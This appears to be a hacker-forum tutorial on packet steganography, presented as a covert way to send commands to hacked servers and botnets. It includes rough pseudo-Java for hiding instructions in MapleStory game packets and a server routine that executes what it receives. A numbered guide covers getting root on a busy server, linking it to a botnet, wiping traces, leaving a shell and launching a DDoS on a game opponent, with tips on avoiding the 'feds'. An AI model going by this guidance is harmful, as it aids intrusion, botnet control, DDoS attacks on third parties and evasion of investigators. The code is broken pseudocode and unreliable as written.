Packet Steganography, anonymize your private keys and botnets.

[Aerosol]

The Packet

Let's look at the packet. That's the thing that makes the internet work, lots of data goes on those, anywhere from 20bytes to 65335 bytes. However, in practice packets are usually around 600 bytes in size. That data stores a lot of info; some is redundant, some is needed, and some is 0'd out. There's a header, a body, extra space, and then error check and footer. It's actually kind of easy to end up with a couple screwed up bits in a packet (obviously not every packet is screwed up, but its not 1 out of every million either).

Changing a little bit of the Packet

What packet steganography is about is changing a couple of bits over a couple of packets. Similar to image steganography, it's almost impossible to detect (in small quantities) (assuming feds are downloading all the data) as packets are not known to all be made equally.

I'm going to quickly give an example.

Game A wants to send packet

[00010101010001000010101010...000010101011000101...]

to Game Server 3. However, you can copy that packet and then resend a slightly modified one, which will look like:

[00010101010001000010101010...111110101001001000...]

Since a massive amount of data is constantly being sent back and forth from the server to you, the packets can be modified a decent amount so information is carried, but one doesn't have to break the checksum by modifying too many bytes. Multiply 40 bits over a couple thousand packets, and a decent amount of data can be sent covertly from you to the server.

What's the best part of this? If you hack servers that get a lot of traffic, it's almost impossible to tell who sent what modded packets to the server even if all of the data is logged because every single packet appears to be legitimate.

While there is a decent amount of modded data transferred you can't just go and start downloading ripped movies with this. The point of packet steganography isn't to anonymize your downloads, but to send little messages over networks that won't be found by normal means.

Obviously, if person A tries to send messages to person B, A won't send them directly. Instead, he could keep them in an encrypted part of a server. When person B wants to see the message, he unlocks the message by passing the correct key.

Psuedocode example using MS

Maplestory packets are nice, because they used to be pretty obvious as to what was going on. After the packet header the data of A)what action you were doing and (if a message) what the message was. The message was in plaintext hexidecimal format. Using the code below, we are going to edit a little character of every single message. To anyone looking at the packet it still appears to be a normal message, just with a small typing error. However, to the server and to you, the message really is no longer a message anymore. It's a specific set of instructions. The first couple of whispers to some random person validates to the server that you are the IP to grab the packets from. The final whisper (or packet) the server sees is a specific command to the server. It could be wipe the program on it, it could be tell these servers to do x, y, and z, or it could just be telling the server that there is going to be a new pattern to look out for, and at what certain time.

Code for your side:

public Whatever{
    //obviously it depends for whatever server you hacked into, and what app communicates with the server, but for now lets pretend we hacked into a maplestory server
    //cool thing about MS is that the packets are pretty easy to understand
    //yes I realize I am turning Java into a scripting language below, but w/e
    public void initContact{
        for(int i=0; i<10; i++){
            String x=scan.grabPacket();
            x=x.substring(0,12)+Integer.toHexString(i)+Integer.toHexString(i)+x.substri?ng(14,x.length());
            XClass.sendPacket(x); //totally possible if string x winds up being a valid packet, which it is since it's just hex
            //obviously you have to make a sendPacket method
        if(scan.nextPacket.equals(neededPacket) 
                XClass.sendPacket(endPacket(Action, Type, IP, Add_Instruct)
        else 
            System.out.println("Connection was unable to be made");
        }
    }
    public String endPacket(String x1, String x2, String x3, String x4){
        return grabHeader() + " 3A BB 0C FF 2D "+mod(x1)+" "+mod(x2)+" 3C "+mod(x3)+" 85  26 "+mod(x4)+grabFooter();        
    }
}

Code for the server(the server is not constantly loading all packets, it only works for a specific amount of time):

import everything2.etc
//you have to watch out the data storage for this one
class ServerInner{
    public void acceptEverything() {
        //kills program in 2 minutes
        long num = 2 * 60 * 1000; //min*sec*milli
        Timer t = new Timer();
        t.schedule( new TimerTask(){public void run(){} },  num);
        // no this isn't  a legit method, you'd want to use outside resources for this part
        //but at least the method dies in the two minute timeframe
        XClass.storeAllPackets();
    }
    public void sortThrough(PacketList P, Method a){
        int x=p.length()
                for(int i=0; i<p.length(); i++){
                    if(!a.follows(p.get(i))){
                        p.rem(i);
                        i--;
                    }
                }
        //after that method runs, the only packets left should be from you
        //obviously it is theoretically possible someone else did the exact same as you, so you'd then check them
        for(int i=0; i<p.length(); i++){
            if(!a.check(p.get(i))){
                p.rem(i);
                i--;
            }
        }
        //now all that's left is the correct one
    }
    public void finishUP(){
        if(p.length()>0){
            //translates the info packet from the correct IP if an ip was gathered
            translate(XClass.nextPacketFrom(p.get1IP()), a);
            //runs whatever it got
            run();
        }

        //wipes all data that was stored, logs in database
        StartClass.wipe();
    }
}

Rough Example in Real Life Application

Packet steganography can also be used for sending out instructions to a botnet since you don't really need to send that much information to tell x to DDOS y, now do you?

Here's a rough guide of how you'd accomplish communicate through your bots to start a DDOS attack w/ packet steganoraphy, from the setting up the server to the attacking the kid who beat you in MW3

1) Find a good server that has a decent amount of traffic, but nothing too sketchy.

2) Get root access on this server.

3) Download wireshark if you don't already have it.

4a)Write your program to test the wireshark logs to find a pattern in packet anomalies (you figure this one out on your own ).

4b)Write the program that can send out edited packets from your machine.

5) Set up another program that connects the wireshark program with your botnet server.

6) Set up a last program that wipes your traces of you fucking off with the server.

7) Run 6 and leave the shell you set up if you want (I suggest keeping some part of it intact though, depends on what you want to do).

8) Set up a couple more of these steno servers.

9) Realize that you can now send instructions easily but make it look like its a normal connection. Want to ddos server agh554? Connect with one of those servers and send the right kind of packets for a little while. Next thing you know your DDOS servers will be connecting with each other to get the details down and start the attack at the time specified. Because of the way the information is transferred from you to the server it'll be hard to trace the botnet back to you and then convict you as the one who pulled the strings behind a DDOS of a n00b MW3 player.

I know that a couple people already do this, but now you know how too.

Ending Thoughts (Read it though)

So why the hell does this matter?

A) all the data will look legitimate

you can send it from different sources and it doesn't really matter as long as the packets are getting screwed correctly

C) You think it's easy to look through every single packet sent to a server that gets a lot of traffic for the past 4ish months and then find the packets that link with the pattern?

D) can be used for stuff other than botnets

i) You can send encryption keys through this and then wipe the programs you installed.

ii) anonymous communcation

E) MITM attacks don't matter unless the MITM got your src(look at number 4)

Problems with this?

1) Server gets taken by the feds. They won't be too happy about this

2) A wingding manages to replicate the correct stream, and then gives out commands for your server. This is something you'll just have to accept. Anonymity is what we are going for, too many traces = too many chances of someone finding a link

3) No well known VPNs allow packet modification at the moment.

4) if the feds got your SRC since you and 800 other skids are using the same program, and they catch you are modding packets, you're kinda screwed if they catch you redhanded

5) "I don't get it"

Solutions to the problems

1) If modded packets are the only connections between your bots and your servers, its a lot harder to trace since the server has a massive amount of people using it

2) Nothing really, make it so it can't easily be replicated

3) wait for it [breathing intensifies]

4) Don't be a skid

5) See above. Or, read the links at the bottom of the page, learn something interesting, and prove to me that there are users with brains here

Credits: TF